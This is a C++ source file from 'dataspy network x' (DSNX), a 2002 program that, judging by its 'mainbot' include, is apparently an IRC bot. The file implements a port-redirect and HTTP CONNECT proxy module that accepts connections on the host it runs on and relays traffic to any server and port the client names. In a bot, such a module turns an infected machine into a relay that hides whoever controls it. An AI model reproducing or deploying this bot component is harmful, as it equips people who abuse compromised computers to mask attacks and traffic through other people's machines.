 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	PortRedirect.cpp - Port redirect & proxy

	Last revised : 31st March 2002

  */




#include "../include/portredirect.h"
#include "../include/mainbot.h"
#include "../include/dsnxsockets.h"
#include "../include/tcp.h"
#include "../include/dsnxsockets.h"
#include "../include/shared.h"

/*

  Proxy uses http CONNECT method:
	CONNECT server:port HTTP/1.x\r\n\r\n

  On connect:
	HTTP/1.x 200 Connection established\r\n\r\n

  On not allowed:
	HTTP/1.x 403 Forbidden

  On connect error :
	HTTP/1.x 404 Not Found\r\nX-Squid-Error: ERR_DNS_FAIL 0\r\n\r\n

  On dns error:
	HTTP/1.x 404 Not Found\r\nX-Squid-Error: ERR_DNS_FAIL 0\r\n\r\n

*/

DWORD DSNX_PortRedirectAccept(PortRedirect *redirect) {

	SOCKET inSock,outSock;
	bool bProxyDecided = false;
	char *inSockData,*outSockData;
	int iIn,iOut;

	redirect->CurThreads ++;

	if (redirect->bProxy == false) {
	
		outSock = SmartConnect( redirect->cServer ,(USHORT)redirect->iOutPort , DEFAULT_CONNECT_TIME );

		if (outSock == INVALID_SOCKET) {

			HardClose(TCPAccept(redirect->s));
			
			redirect->CurThreads --;

			return 0;
		}
		bProxyDecided =true;
	}

	inSock = TCPAccept(redirect->s);

	while ( redirect->bStopUse == false ) {

		if (bProxyDecided == false) {

			if (TCPRecv(inSock,&inSockData)>0) {
				if (!strnicmp(inSockData,"connect ",8)) {
					char *p = strchr(inSockData+8,' '),*port;
					int iPort=0;

					if(!p) 
						break;

					*p=0;

					port = strchr(inSockData+8,':');

					if (!port)
						break;

					*port++ = 0;

					iPort = atoi(port);

					if (!iPort)
						break;

					outSock = SmartConnect(inSockData+8,iPort,DEFAULT_CONNECT_TIME);

					if (outSock == INVALID_SOCKET) {
						TCPSend(inSock,"HTTP/1.1 404 Not Found\r\n\r\n",26);
						closesocket(inSock);
						free(inSockData);
						break;
					}

					bProxyDecided = true;
					TCPSend(inSock,"HTTP/1.0 200 OK\r\n\r\n",19);
					free(inSockData);
				}
			}
		}

		iIn = TCPRecv(inSock,&inSockData);
		iOut = TCPRecv(outSock,&outSockData);

		if (iIn >0) {
			TCPSend(outSock,inSockData,iIn);
			free(inSockData);
		}
		if (iOut>0) {
			TCPSend(inSock,outSockData,iOut);
			free(outSockData);
		}

		if (iOut == -1 || iIn == -1)
			break;

		Sleep(10);
	}

	closesocket(inSock);
	closesocket(outSock);

	redirect->CurThreads --;

	return 0;
}

PortRedirect::PortRedirect(char *out_server,USHORT out_port,USHORT in_port,bool bProxy) : DSNXSocket(out_server,in_port) {

	DWORD tid;

	this->bProxy = bProxy;
	this->iOutPort = out_port;
	wUniqueID = PortRedirect_ID;

	CreateThread(NULL,0,(DWORD(__stdcall *)(void *))DSNXListenLoop,(LPVOID)this,0,&tid);
}

DWORD PortRedirect::Dome(void *p) {

	DWORD tid;
	CreateThread(NULL,0,(DWORD(__stdcall *)(void *))DSNX_PortRedirectAccept,(LPVOID)this,0,&tid);	

	return 0;

}

